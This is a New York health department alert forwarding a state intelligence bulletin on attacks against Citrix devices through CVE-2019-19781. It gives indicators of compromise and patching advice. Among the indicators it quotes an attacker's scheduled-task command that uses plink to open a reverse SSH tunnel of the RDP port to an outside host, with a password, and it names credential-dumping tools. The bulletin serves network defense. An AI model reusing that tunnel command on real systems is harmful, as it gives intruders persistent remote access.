mopdf.com

New York State Department of Health (NYSDOH)ALERTApril 3, 2020Cyber Security VulnerabilityThe New York State Intelligence Center Cyber Analysis Unit (NYSIC-CAU) has alerted andbriefed the NYSDOH regarding the active threat of a cyber-attack that exploits a vulnerability inCitrix Gateway Management Devices such as Netscaler, a widely used product.This is a substantial threat. If this vulnerability is exploited, remote attackers can executecommands on a targeted device that allow them to gain a foothold inside the targeted networksand establish persistent access, even after the vulnerability has been patched. Furthermalicious activity, such as spreading ransomware that can seriously impact downstream facilityoperations, has been observed in multi-stage types of attack. These attacks have been seen inboth public and private entities in NYS, including hospitals/healthcare facilities. A successfulattack at this time of pandemic response could greatly debilitate those critical activities.The NYSIC-CAU has issued a Cyber Intelligence Bulletin (see attached) to assist ChiefInformation Security Officers (CISO) at organizations to successfully patch and scan theirnetworks for evidence of compromise.Please immediately share this bulletin with your hospital’s CISO and information systems staff.If your information technology (IT) department suspects a compromise, please contact yourlocal law enforcement and also contact your NYSDOH regional office, per the attachedNYSDOH poster, to report the compromise.The NYS Cyber Command Center, in conjunction with NYSIC and Department of HomelandSecurity and Emergency Services (DHSES), will be recording a technical webinar that will walkthrough the details of this attack and offer suggested actions for remediation. Please share theattached bulletin with your IT staff and/IT vendors. The link to the recording will be madeavailable to providers on Tuesday, April 7, 2020.Should you have more immediate questions after reviewing the attached Cyber Bulletin, pleasesend email to the following address at the Cyber Incident Response Team (CIRT), NYS(DHSES): [email protected]

UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEYFebruary 28, 2020NYSIC-CYB-20-02ATTN:Information Technology Personnel (All Sectors)SUBJECT:Active Citrix Vulnerability Compromises at Government Agencies in U.S.OVERVIEW: In December 2019, a vulnerability was identified (CVE-2019-19781) that affects CitrixApplication Delivery Controllers, Citrix Gateways (NetScaler Gateways), and Citrix SD-WAN WANOPappliances. If exploited, CVE-2019-19781 allows unauthenticated actors to perform arbitrary codeexecution. Citrix began releasing patches for the vulnerability on January 19th. The New York StateIntelligence Center Cyber Analysis Unit (NYSIC CAU) became aware the potential risk to NYS as Citrixtechnologies are commonly used by state, county, and local entities. The NYSIC CAU sent aSituational Report (SITREP) on January 29, 2020 detailing the release of a free scanning tool providedby Citrix and FireEye Mandiant, “Indicator of Compromise Scanner,” to aid customers in the detectionof a compromise in connection with CVE-2019-19781. The NYSIC CAU recommended that all agenciesutilizing the vulnerable technology implement the available patch and then use the scanning tool tocheck their networks for evidence of a compromise. Since that release, the NYSIC CAU has becomeaware of multiple compromises directly related to CVE-2019-19781 impacting government agencies.These incidents are ongoing and the full extent of the impact is not yet known.Multiple indicators were collected from the first agency incident and have been shared below in supportof network defense. Forensic analysts found that the actor was leveraging scheduled tasks as apersistent mechanism to launch tunnels using plink.exe and ngrok. The actor also obfuscated theiractivity by renaming malicious files as trusted files. ngrok was renamed svchost.exe and scheduled torun every 12-24 hours to establish a tunnel.Initial forensics of a second agency incident has revealed an IP address known to be associated withthe NOTROBIN malware. No artifacts or further activity associated with NOTROBIN has beendiscovered at this time. Threat researchers released an open-source report on January 16 detailing aseparate incident against an unnamed victim in which the malicious actor(s) installed a backdoor withthe NOTROBIN malware and then implemented the patch for the CVE-2019-19781 to maintainexclusive access to the network. The NOTROBIN malware is new and had not been seen by threatresearchers prior to that incident.INDICATORS OF COMPROMISE:IP Address13[.]82[.]216[.]70IP Address40[.]117[.]127[.]90IP Address95[.]179[.]163[.]186Please note that some of this information describes first amendment protected activities. The NYSIC recognizes that Americans haveconstitutionally protected rights to assemble, speak, and petition the government. The NYSIC safeguards these rights and only reports onFirst Amendment protected activities, although no violence or criminality has been observed, this information is provided for operationalplanning in the interest of assuring the safety and security of the demonstrators and the public.Requirements: NY-SIN- 1.1, 1.3, 1.5, 1.8 & 1.10UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEY

UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEYFileFileFileFileFileFileScheduled TaskMimikatz.pySecretsdump.pySvchost.exe (seen anywhere else other than C:\windows\system32)Admin.php (/var/themes/admin.php)Chisel (/var/nstmp/chisel)Tiny.php Actions Context ”Author” Exec Command C:\Windows\IME\en-US\plink.exe /Command Arguments ssh -R 2326:127.0.0.1:3389 [email protected] 0b:0e -pwArbab@123! -batch /Arguments /Exec /Actions The indicators are attached in an Excel file for accessibility purposes:RECOMMENDATIONS: The NYSIC CAU offers the following recommendations to mitigate threatsassociated with CVE-2019-19781. This is not a comprehensive list of mitigation strategies. Immediately implement all patches for CVE-2019-19781-vulnerable technologies used in yourorganization. For more information on available patches, visit the official Citrix article availableat: https://support.citrix[.]com/article/CTX267027. Use the “Indicator of Compromise Scanner” tool to detect a compromise in connection withCVE-2019-19781. The tool has been made available on Github by Citrix and FireEye Mandiant.The tool and instructions can be found at: 781/. If scans return positive artifact identification, please contact 844-OCT-CIRT forreporting purposes and/or to request assistance. Change default passwords on all accounts. Maintain heightened log monitoring and awareness for suspicious activity on networks,especially those related to critical infrastructure. Evaluate third party access to their networks and, if relevant, consider having a conversationwith their Managed Service Providers (MSPs) to ensure appropriate steps are being taken tomitigate risk. Evaluate and manage third-party risks from the supply chain and vendors. Keep all systems up-to-date and apply appropriate patches when necessary. Ensure backups of systems are current and stored offline. Implement and maintain hardened configurations of systems.Please note that some of this information describes first amendment protected activities. The NYSIC recognizes that Americans haveconstitutionally protected rights to assemble, speak, and petition the government. The NYSIC safeguards these rights and only reports onFirst Amendment protected activities, although no violence or criminality has been observed, this information is provided for operationalplanning in the interest of assuring the safety and security of the demonstrators and the public.Requirements: NY-SIN- 1.1, 1.3, 1.5, 1.8 & 1.10UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEY

UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEY Remind employees to engage in cyber hygiene best practices; especially when utilizing emailand internet connected services.HISTORY: The following intelligence products related to CVE-2019-19781 were previously sent outby the NYSIC CAU in an effort to inform partners and customers. These products have beenattached for your convenience. NYSIC CAU Situational Report: (TLP: GREEN) Citrix Scanning Tool for CVE-2019-19781 DHS CYMC IE - (U//FOUO/RELUSAFVEY) At Least Some Cyber Actors Who ExploitedVulnerable Citrix Devices in USG Networks Likely Established Backdoor Access DHS CYMC IE - (U//FOUO/REL USA, FVEY) Advanced Persistent Threat Cyber ActorsLikely Use Citrix Vulnerability to Compromise Numerous US NetworksOUTLOOK: At this time the NYSIC CAU is aware of CVE-2019-19781 being used to directly impactentities within the United States. The NYSIC CAU reminds all recipients to report suspicious activity ofa cyber threat nature to 844-OCT-CIRT, and suspicious activity of a physical threat nature to 866SAFE-NYS while utilizing 911 for emergencies.For further information regarding the content of this bulletin, please contact the NYSIC-CAU at (518) 786-2191 [email protected] note that some of this information describes first amendment protected activities. The NYSIC recognizes that Americans haveconstitutionally protected rights to assemble, speak, and petition the government. The NYSIC safeguards these rights and only reports onFirst Amendment protected activities, although no violence or criminality has been observed, this information is provided for operationalplanning in the interest of assuring the safety and security of the demonstrators and the public.Requirements: NY-SIN- 1.1, 1.3, 1.5, 1.8 & 1.10UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEY